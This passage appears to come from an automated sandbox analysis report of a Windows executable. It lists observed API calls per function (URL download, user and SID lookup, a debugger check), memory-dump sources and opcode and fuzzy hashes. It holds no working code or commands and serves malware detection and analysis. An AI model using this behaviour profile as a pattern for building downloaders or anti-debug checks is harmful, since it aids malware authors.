                                                                APIs
                                                                • InternetOpenW.WININET(00434EFC,00000000,00000000,00000000,00000000), ref: 004042CC
                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004042DE
                                                                • InternetReadFile.WININET(00000000,E64E1EA0,03E80000,03E80000), ref: 004042F1
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404302
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404305
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404313
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404316
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandle$Open$FileRead
                                                                • String ID:
                                                                • API String ID: 4294395943-0
                                                                • Opcode ID: 7cf6284909f286678b431d0b7701e821ebe6460720c72ddbca33a4e3289a406a
                                                                • Instruction ID: d4460e6594f183dd8fbd5c6a35e334755fb906af117da0c2693caa719dd5e9b3
                                                                • Opcode Fuzzy Hash: 7cf6284909f286678b431d0b7701e821ebe6460720c72ddbca33a4e3289a406a
                                                                • Instruction Fuzzy Hash: 1D51C571F00108ABDB14DFA4CC41BEEBB75EF89300F60852EE911B7290D7399945CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 597776487-0
                                                                • Opcode ID: 55acbcffade6baf4cd24fac65c32f1f8042ce55b1cd6b8e204445f414faf138a
                                                                • Instruction ID: 0a3dac8c0d2f4ab523d7b0c170e7acef0f0f927e43a4501e6aab2b421f423aab
                                                                • Opcode Fuzzy Hash: 55acbcffade6baf4cd24fac65c32f1f8042ce55b1cd6b8e204445f414faf138a
                                                                • Instruction Fuzzy Hash: ECC14571B002649FDB20AF69E841BAB7BA8EF95354F9501AFE540D7381E7388D41CB9C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,?,E64E1EA0,00000000), ref: 004054E9
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405550
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00405557
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcVersion
                                                                • String ID:
                                                                • API String ID: 3310240892-0
                                                                • Opcode ID: 962d5339703cb46b45d1035e38f139a1028016193647132356b397c134aae68c
                                                                • Instruction ID: d93702cff96d9b86482a03c3b5f1d4bd7b2cac7a22e29a7da7631487a0085e50
                                                                • Opcode Fuzzy Hash: 962d5339703cb46b45d1035e38f139a1028016193647132356b397c134aae68c
                                                                • Instruction Fuzzy Hash: 6C512970D006049BDB14EB28DE497DEBB75EB46314F9042BAE809A73C1DB399EC08F59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -
                                                                • API String ID: 0-2547889144
                                                                • Opcode ID: 8ec984269fc204e11f3a00a0022ef8150b4d3cc481596e17900e08606637af1a
                                                                • Instruction ID: 66d1256024fa6b80d309a6167c314416fb1e0f995a2940995c03682f4c0b35a5
                                                                • Opcode Fuzzy Hash: 8ec984269fc204e11f3a00a0022ef8150b4d3cc481596e17900e08606637af1a
                                                                • Instruction Fuzzy Hash: CB5270B0D041589BEF65DB24CD897CDBBB5AB52308F5081E9D409272C2DB791FC88F9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0041CC58
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041CC62
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041CC6F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: d01e7f133785e3bb0beafcf269aef2531f9dd5a62572b740f5956f5575e894ef
                                                                • Instruction ID: 6e0a840d613f948629d69306ea8559204aa93db5cd8eb08d912f64573995077d
                                                                • Opcode Fuzzy Hash: d01e7f133785e3bb0beafcf269aef2531f9dd5a62572b740f5956f5575e894ef
                                                                • Instruction Fuzzy Hash: B531A2749412189BCB21DF65DD89BD9BBB8AF08310F5041EAE41CA7291EB749F858F48
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00428578,?,?,00000008,?,?,00428210,00000000), ref: 004287AA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID:
                                                                • API String ID: 3997070919-0
                                                                • Opcode ID: 5ef4d00b5429483db4ee21fa4326bc925bf0c13a1e125d06c7f23f728c6050ca
                                                                • Instruction ID: 7ee8650f83220fdd883e25b8fb9bd1314921049ff4237cec4aadef3bc0018f13
                                                                • Opcode Fuzzy Hash: 5ef4d00b5429483db4ee21fa4326bc925bf0c13a1e125d06c7f23f728c6050ca
                                                                • Instruction Fuzzy Hash: 38B17C31211618CFD718CF28D486B697BA0FF44364FA5865DE899CF3A1CB39E992CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041897D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID:
                                                                • API String ID: 2325560087-0
                                                                • Opcode ID: 3e8caeb6bfef737ed616e744e7bca8f82915d963378d3ddd84fda9c9aae8233d
                                                                • Instruction ID: 930e07020ffdb23925cbd3b9f6792be66dda1da8ea5e653575129db29331b3e6
                                                                • Opcode Fuzzy Hash: 3e8caeb6bfef737ed616e744e7bca8f82915d963378d3ddd84fda9c9aae8233d
                                                                • Instruction Fuzzy Hash: EC517AB2A102158BDB18CF55DA917AABBF4FB48394F24842FD801EB350D778AD41CF69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 022df617a6a97238b54203123924cf70bb7f092af4fd1c9094ef73ba4957732d
                                                                • Instruction ID: 0328ba7611a17a77fc9fa70e32aa860e7f499fe8194037fa27d83726f3353cb5
                                                                • Opcode Fuzzy Hash: 022df617a6a97238b54203123924cf70bb7f092af4fd1c9094ef73ba4957732d
                                                                • Instruction Fuzzy Hash: 9941D9B590422CAFDB24DF69DC89AEABBB8EF45304F5402DEE40DD3202D6355D848F54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00018CB8,004187B1), ref: 00418CB1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: d6e99fe2a3e00c7e8795d25e94eaf0f7e14de702cc9eb68ebfb380ab2ec16c2e
                                                                • Instruction ID: 746b8b48521946ac0cb7c0911af6d740726ccd679edd01843d8e5942db247f9b
                                                                • Opcode Fuzzy Hash: d6e99fe2a3e00c7e8795d25e94eaf0f7e14de702cc9eb68ebfb380ab2ec16c2e
                                                                • Instruction Fuzzy Hash:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: HeapProcess
                                                                • String ID:
                                                                • API String ID: 54951025-0
                                                                • Opcode ID: 71cfc615a41c3298b5445f93b53bef01396a23fbd50f63aed53a6d59f7cf4ae4
                                                                • Instruction ID: 5df0cfe7b3464aa7b9b66a1b639ee44698724d998aaf17deffbb5b24500d1645
                                                                • Opcode Fuzzy Hash: 71cfc615a41c3298b5445f93b53bef01396a23fbd50f63aed53a6d59f7cf4ae4
                                                                • Instruction Fuzzy Hash: 06A011302002008BAB008F30AA88B283AE8AA082E03A800B8A008C8020EB208088AA0C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction ID: 16de03951b86b8feeabb23d9e4c0640400c7f2996d7e90273d9835788c3a6ac4
                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction Fuzzy Hash: FD1126773010A1A3D6068A2DF8F46B7A395EBC6321FAD426BC0424B74CC36ADDC19508
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6e3000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                • Instruction ID: dac2698801bf5029e7279f8b784b03df05ad802ec424b502f9e4816e36086835
                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                • Instruction Fuzzy Hash: F611CE72740210AFDB40CF56DC85FA273FAEB88320B298069ED08CB356D675EC02C7A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                • Instruction ID: 2dbb804fcf195cc8c59a6eee79191894b8e3f54bc0695bd72d83ca6bbf0caf24
                                                                • Opcode Fuzzy Hash: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                • Instruction Fuzzy Hash: 8EE08632911238EBCB14DB89C50898AF7ECE748B44B11455BF901D3100C2B4DE40C7D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00403822
                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00403837
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040383A
                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00403848
                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0040386B
                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00403876
                                                                • HeapAlloc.KERNEL32(00000000), ref: 00403879
                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00403889
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040388C
                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 004038B6
                                                                • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 004038C9
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004039C5
                                                                • HeapFree.KERNEL32(00000000), ref: 004039CE
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039D3
                                                                • HeapFree.KERNEL32(00000000), ref: 004039D6
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039DD
                                                                • HeapFree.KERNEL32(00000000), ref: 004039E0
                                                                • LocalFree.KERNEL32(00000000), ref: 004039E5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                • String ID:
                                                                • API String ID: 3326663573-0
                                                                • Opcode ID: 49428334a3cb8c5dc93c7d480cad54d6ea37dc6ea1b61049bcf977d5b361213f
                                                                • Instruction ID: 89794ae1973fad5ea7192e5804e0dc8d95b01a905eaed68a0387455b0bbf754c
                                                                • Opcode Fuzzy Hash: 49428334a3cb8c5dc93c7d480cad54d6ea37dc6ea1b61049bcf977d5b361213f
                                                                • Instruction Fuzzy Hash: 857160B1E00209ABDB14DFA5DC85BAFBFBCEF49300F40453AE905A7281DB759905CB64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 00422735
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004222EB
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004222FD
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042230F
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422321
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422333
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422345
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422357
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422369
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042237B
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042238D
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042239F
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004223B1
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004223C3
                                                                • _free.LIBCMT ref: 0042272A
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 0042274C
                                                                • _free.LIBCMT ref: 00422761
                                                                • _free.LIBCMT ref: 0042276C
                                                                • _free.LIBCMT ref: 0042278E
                                                                • _free.LIBCMT ref: 004227A1
                                                                • _free.LIBCMT ref: 004227AF
                                                                • _free.LIBCMT ref: 004227BA
                                                                • _free.LIBCMT ref: 004227F2
                                                                • _free.LIBCMT ref: 004227F9
                                                                • _free.LIBCMT ref: 00422816
                                                                • _free.LIBCMT ref: 0042282E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
                                                                • Instruction ID: 461f1e78c3464bc4a48008cddc69d5b42509e70b2aac72d5241b0bc94f255431
                                                                • Opcode Fuzzy Hash: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
                                                                • Instruction Fuzzy Hash: 0E316031B04311EFDB20AA3AE945B9773E8AF50314F91452FE845D7251DBB8EC92872C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00419D02
                                                                • type_info::operator==.LIBVCRUNTIME ref: 00419D29
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00419E35
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00419F10
                                                                • _UnwindNestedFrames.LIBCMT ref: 00419F97
                                                                • CallUnexpected.LIBVCRUNTIME ref: 00419FB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 2123188842-393685449
                                                                • Opcode ID: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
                                                                • Instruction ID: 55aba353ce1f2b03f7557c62acf52ca59a8224d4baa2e58a88d4b1d7c662f595
                                                                • Opcode Fuzzy Hash: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
                                                                • Instruction Fuzzy Hash: D9C18B71900209AFCF29DFA5C8919EEBBB5BF14314F04415BE815AB242D339DD92CF9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 0041EE70
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 0041EE7C
                                                                • _free.LIBCMT ref: 0041EE87
                                                                • _free.LIBCMT ref: 0041EE92
                                                                • _free.LIBCMT ref: 0041EE9D
                                                                • _free.LIBCMT ref: 0041EEA8
                                                                • _free.LIBCMT ref: 0041EEB3
                                                                • _free.LIBCMT ref: 0041EEBE
                                                                • _free.LIBCMT ref: 0041EEC9
                                                                • _free.LIBCMT ref: 0041EED7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
                                                                • Instruction ID: 06351b20bf99703dcd7bf9b8d39c0ae7e0177a32b915429fb414c1ff2a1cc787
                                                                • Opcode Fuzzy Hash: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
                                                                • Instruction Fuzzy Hash: 4321EABA940208EFCF41EF96C841CDE7BB8AF18344B81416AF9159B121EB35DA95CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042767F), ref: 00427D2C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer
                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                • API String ID: 3527080286-3064271455
                                                                • Opcode ID: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
                                                                • Instruction ID: 06daac8c886ad40bfc3f5fc7b7f7e77c663449c06db021f2b6458f19738d1afc
                                                                • Opcode Fuzzy Hash: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
                                                                • Instruction Fuzzy Hash: 12517170A0852ACBCF149F58F9481AEBFB0FF49305F924096E441A7264C77C9D5A8B6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
                                                                • Instruction ID: c3b722db2c5acca593ef2b985c6e8c5028b49e802bec8f04f8f593b2d7ca9a6e
                                                                • Opcode Fuzzy Hash: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
                                                                • Instruction Fuzzy Hash: 9EC1F7B0F042559FDF11DF99E880BAE7BB0BF49304F91405BE941A7392C7789982CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$___from_strstr_to_strchr
                                                                • String ID:
                                                                • API String ID: 3409252457-0
                                                                • Opcode ID: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
                                                                • Instruction ID: 5262ae90983e57a577d1a6d47923df6c9a1a1cc28a3224689016cc5a84fe2567
                                                                • Opcode Fuzzy Hash: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
                                                                • Instruction Fuzzy Hash: 5F517E70F40324EFEB10AF76A88199E7BB4AF21314F94406FE91097262EE3D9941CB4D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 004195E7
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 004195EF
                                                                • _ValidateLocalCookies.LIBCMT ref: 00419678
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004196A3
                                                                • _ValidateLocalCookies.LIBCMT ref: 004196F8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
                                                                • Instruction ID: 5178301fb53efe35cb3bc6ec9000bbd01032083e63e087f95639f1ef71daa0d4
                                                                • Opcode Fuzzy Hash: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
                                                                • Instruction Fuzzy Hash: 8A41EA34A00218ABCF10DF69C894ADE7BB1BF45328F14816BE8145B352D739DE95CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 0-537541572
                                                                • Opcode ID: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
                                                                • Instruction ID: d7f8f66c5accd2a474fa2c9e550e026180df2d9793049625905f73b7f49e49c8
                                                                • Opcode Fuzzy Hash: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
                                                                • Instruction Fuzzy Hash: 16212E79A01210EBCB3197649C40AEB37689B05760F610273ED06E73D1D639ED4B85DC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00422435: _free.LIBCMT ref: 0042245A
                                                                • _free.LIBCMT ref: 004224BB
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
